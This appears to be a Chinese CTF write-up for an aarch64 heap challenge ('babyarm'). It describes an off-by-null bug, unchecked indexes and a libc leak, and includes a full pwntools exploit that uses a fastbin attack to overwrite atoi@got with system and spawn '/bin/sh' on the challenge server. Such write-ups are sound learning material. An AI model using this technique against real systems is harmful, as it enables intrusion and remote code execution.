Loading

pwnhub-public-2-babyarm

pwnhub-public-2-babyarm

总结

~

checksec

image-20220225211444707

题目的架构为aarch64,小端序。

程序分析

分析后发现为经典的增删改查的题目,漏洞点也比较多,这里给出几个漏洞点:

  1. edit函数中,没有校验索引和大小

image-20220220143908177

  1. read_input函数中,存在off by null

    image-20220220144002459

  2. dele分支中,没有校验索引

  3. secret分支中,可以泄露地址

利用过程

调试后发现,程序没有开启aslr,所以每次启动的地址都是一样的

利用secret泄露出libc地址,然后利用fastbin attack修改堆指针,最后用editatoi@got修改为system地址

unsorted bin chunkfd/bk泄露libc地址:

image-20220220150218344

计算出远程的system地址为:0x400086f818

然后fastbin attack打即可:

image-20220220150750751

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-

from pwn import *

context.update(arch="aarch64", os="linux", endian="little", log_level="debug", timeout=10)

io = remote("121.40.89.206", 10041)

def add(size):
    io.sendlineafter("> ", "1")
    io.sendlineafter("size:", str(size))

def edit(idx, data):
    io.sendlineafter("> ", "2")
    io.sendlineafter("id:", str(idx))
    if not data.endswith(b"\n") and len(data) < 0x18:
        data += b"\n"
    io.sendafter("content:", data)

def dele(idx):
    io.sendlineafter("> ", "3")
    io.sendlineafter("id: ", str(idx))


def secret(data):
    io.sendlineafter("> ", "110")
    io.sendafter("ohhhh!you find a secret \n", data)

# leak addr
# add(0x80)
# add(0x10)
# dele(0)
# secret("a"*8)
# msg = io.recvall(timeout=3)
# print(msg)
# io.close()
# exit(0)

add(0x80)
add(0x30)
dele(1)
# 修改fd
edit(1, p64(0x41209a))
# fastbin attack
add(0x30)
add(0x30)

edit(3, b"\x41" + b"\x00" * 5 + p64(0x412010)) # atoi@got

system_addr = 0x400086f818
edit(2, p64(system_addr)[:6])

io.sendline("/bin/sh")

io.interactive()

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli

posted @ 2022-04-05 21:37  LynneHuan  阅读(41)  评论(0编辑  收藏  举报